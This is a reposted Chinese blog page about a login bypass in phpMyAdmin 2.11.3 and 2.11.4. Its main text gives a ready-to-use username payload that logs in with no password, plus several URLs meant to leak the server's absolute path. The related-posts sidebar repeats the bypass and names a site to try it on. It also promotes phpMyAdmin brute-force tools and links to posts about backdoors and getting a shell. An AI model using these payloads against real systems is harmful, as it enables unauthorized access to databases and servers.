【转】phpmyadmin万能密码漏洞

最新推荐文章于 2023-06-27 20:07:14 发布
最新推荐文章于 2023-06-27 20:07:14 发布
阅读量443 收藏
点赞数
原文链接:http://www.cnblogs.com/demonspider/p/3307781.html
版权

影响版本:2.11.3 / 2.11.4

利用方法:用户名处写入‘localhost’@'@”则登录成功。 (注意全部是英文标点符号,最后一个为英文双引号)

附上几个php爆绝对路径的办法:

phpMyAdmin/libraries/select_lang.lib.php

phpMyAdmin/darkblue_orange/layout.inc.php

phpMyAdmin/index.php?lang[]=1

phpmyadmin/themes/darkblue_orange/layout.inc.php

转载于:https://www.cnblogs.com/demonspider/p/3307781.html

weixin_30466953
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpMyAdmin(MySQL)暴力破解工具v1.3.rar
06-18
目前phpMyAdmin3.2.5,phpMyAdmin3.2.1、phpMyAdmin2.11.2版本测试均成功! 此工具仅供网友技术学习交流使用,请勿使用于非法用途。
PHPmyadmin 2.11.4万能密码
java开发指南博客 【转载】
05-21 236
‘localhost’@’@” PHPmyadmin 2.11.3 两个版本都有此漏洞 我去测试了一下 确实可以用。。。 给你找到一个测试网址http://www.hitag.cn 你们可以试一下 只需要输入账号 密码不需要输入 利用代码如下: ‘localhost’@’@” 原文章http://www.0x6.us/?FoxNews=5....
PHPmyadmin 2.11.4万能密码漏洞
收集盒 Book box
05-20 2181
PHPmyadmin 2.11.4 PHPmyadmin 2.11.3 两个版本都有此漏洞 我去测试了一下 确实可以用。。。 给你找到一个测试网址http://www.hitag.cn 你们可以试一下 只需要输入账号  密码不需要输入 利用代码如下: ‘localhost’@'@”   http://www.cnyzy.cn/blogvi
phpmyadmin万能密码
kuxing100的专栏
07-25 6520
phpmyadmin 2.11.3 phpmyadmin 2.11.4 利用方式: 直接在phpmyadmin的用户名内填入: ‘localhost’@'@” 不用填入密码,可以直接登录,管理权限哦。
phpmyadmin 万能密码漏洞
weixin_30344131的博客
10-11 680
基本2.x.x 版本,空密码也能登录phpmyadmin ,'localhost'@'@'' 查了下,基于mysql 数据库权限的漏洞造成 默认会有一个user 为’’ 空的帐号 ''@localhost mysql -u'' -p 直接能进数据库,把这个帐号删除就ok了 ,drop user ''@localhost 或者升级高版本的phpmyadmin 。3.x 版本就没有的 ...
phpMyAdmin通过密码漏洞留后门文件
10-17
今天小编就为大家分享一篇关于phpMyAdmin通过密码漏洞留后门文件,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
phpMyAdmin漏洞利用与安全防范
02-25
但是,如果存在设置的Root密码过于简单,代码泄露Mysql配置等漏洞,通过一些技术手段,99%都能获取网站webshell,有的甚至是服务器权限。phpMyAdmin在一些流行架构中大量使用,例如phpStudy、phpnow、Wammp、Lamp、...
允许phpmyadmin密码登录的配置方法
10-28
在Mysql修改root密码的命令及方法一文中,我提到了使用phpmyadmin修改Mysql的root密码的方法,但是当你将phpmyadmin登录密码设置为空密码时,尽管你通过Mysql命令行方式可以以空密码进入Mysql,但是当你重新以空密码...
利用phpmyadmin找回wordpress忘记管理密码
09-29
在这种情况下,我们可以利用phpMyAdmin这个强大的MySQL数据库管理工具来更改WordPress的管理员密码。以下是使用phpMyAdmin找回WordPress忘记管理密码的详细步骤: 1. **确认数据库信息**: 在开始操作前,你需要...
爆破phpmyadmin
m0_51589948的博客
08-08 1147
爆破phpmyadmin 因为是第一次写脚本,所以没有爆破phpmyadmin的思路 后来百度到很多爆破phpmyadmin的脚本,找到了一些思路 大概就是用python构造对phpmyadmin的登录请求,根据登录前后的源码中的一些不同的信息判断是否登录成功,我们又从发送的请求包中获取了请求参数,以及文件头信息·pma_username=roofffffft&pma_password=fffroot&server=1&token=3b88f0df1d082083aae8b4ccc
phpMyAdmin暴力破解工具
04-05
一个phpMyAdmin暴力破解工具,字典自己加载
mysql数据库的密码破解/用户授权/备份/图形化管理工具phpmyadmin
weixin_44310047的博客
05-21 877
mysql数据库的密码破解/用户授权/备份/图形化管理工具phpmyadmin 1、数据库密码管理 a)数据库密码更改(知道数据库原密码) 实验步骤: 1)使用mysqladmin -u指定用户 -p旧密码 password 新密码可以直接更改密码 b)数据库密码破解(不知道数据库原密码) 实验步骤: 1)关闭mariadb服务,调用数据库的安全模式mysqld_safe --skip-grant-tables打入后台运行(否则会占用系统终端),mysql可直接进入数据库,进入mysql库查询表user中
phpmyadmin爆破之python
m0_65129142的博客
12-21 2078
前言: 在一个秋高气爽的上午,佛系的我在做着佛系的事,正喝着猫屎咖啡(wocao),城里人真会玩,有没有鸡屎coffee。。。突然一个安服的美女给我发来一个微信,我来以为的约我看电影呢,上来一句就说原来的phpmyadmin后台登录爆破工具不行了。 还给我发来个工具的截图: 想着闲着也是蛋疼,那既然美女开口了,那我就看看呗 这个工具是个老古董,现在都神马年代了。phpmyadmin早就更新了,爆破不了,那也是正常的。 正式开始: 废话不多说,我们先开始搭建测试环境,先是下载phpstudy集成环境。 这里
phpMyAdmin
梦想的天空
08-10 2306
<br />phpMyAdmin 是一个用PHP编写的,可以通过 web 方式控制和操作 MySQL 数据库。通过 phpMyAdmin 可以完全对数据库进行操作,例如建立、复制、删除数据等等。 <br />如果使用合适的工具,MySQL 数据库的管理就会为得相当简单。应用 MySQL 命令行方式需要对 MySQL 知识非常熟悉,对 SQL语言也是同样的道理。不仅如此,如果数据库的访问量很大,列表中数据的读取就会相当困难。<br />当前出现很多 GUI MySQL 客户程序,其中最为出色的是基于 Web
记一次phpMyAdmin弱口令爆破事件应急响应
Boom!脑洞大爆炸的博客
06-27 921
记一次phpMyAdmin弱口令爆破事件应急响应
phpmyadmin爆破脚本练习
u014794539的博客
08-08 1668
初学python不久 记录一下写脚本的过程 思路 过程 首先 是要对于phpadmin的账号密码进行爆破 先找个环境抓个包看看 了解到需要脚本中 准备 请求头 还需要获取到token 最好还能获取到标题 以作验证 提交的数据中 需要pma_username pma_password server=1 target=index.php token等数据 还要进行会话保持 http协议本身是无状态的,为了让请求之间保持状态,有了session和cookie机制。requests也提供了相
PhpMyadmin任意文件读取漏洞
cnbird's blog
11-07 5718
libraries/import/xml.php中 unset($data); /** * Load the XML string * * The option LIBXML_COMPACT is specified because it can * result in increased performance without the need
phpmyadmin getshell到提权
Ms08067安全实验室
03-13 955
一. 环境准备:靶机:win7 32 位。环境:php:5.45MYsql:5.5.53Apache:2.4s二. 开始攻击。访问目标站点,发现开启33...
网站漏洞修复对phpmyadmin防止被入侵提权的解决办法
weixin_33991727的博客
11-26 304
2019独角兽企业重金招聘Python工程师标准>>> ...
phpmyadmin漏洞
最新发布
07-27
引用\[1\]:根据网上公开的phpMyadmin文件包含漏洞,通过代码审计定位危险函数,然后逐步分析,最终确定payload,并通过本地搭建phpMyadminV4.8.1版本成功进行漏洞复现。实际上该漏洞对于大部分版本的phpMyadmin都生效,因此有使用该系统的需要引起格外的重视,及时修补该漏洞。\[1\]引用\[2\]:文件包含漏洞是指在程序中动态引用了用户可控制的文件,而没有对用户输入进行充分的过滤和验证,导致攻击者可以通过构造恶意的文件路径来读取、执行或者包含任意文件。\[2\]引用\[3\]:在phpMyadmin的大部分版本中都存在文件包含漏洞。\[3\] 问题: phpmyadmin漏洞是什么? 回答: phpMyadmin漏洞是指在phpMyadmin程序中存在的文件包含漏洞。该漏洞允许攻击者通过构造恶意的文件路径来读取、执行或者包含任意文件。这个漏洞对于大部分版本的phpMyadmin都生效,因此使用该系统的用户需要格外重视,并及时修补该漏洞。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* *2* *3* [phpmyadminV4.8.1本地文件包含漏洞复现](https://blog.csdn.net/weixin_64551911/article/details/125609281)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值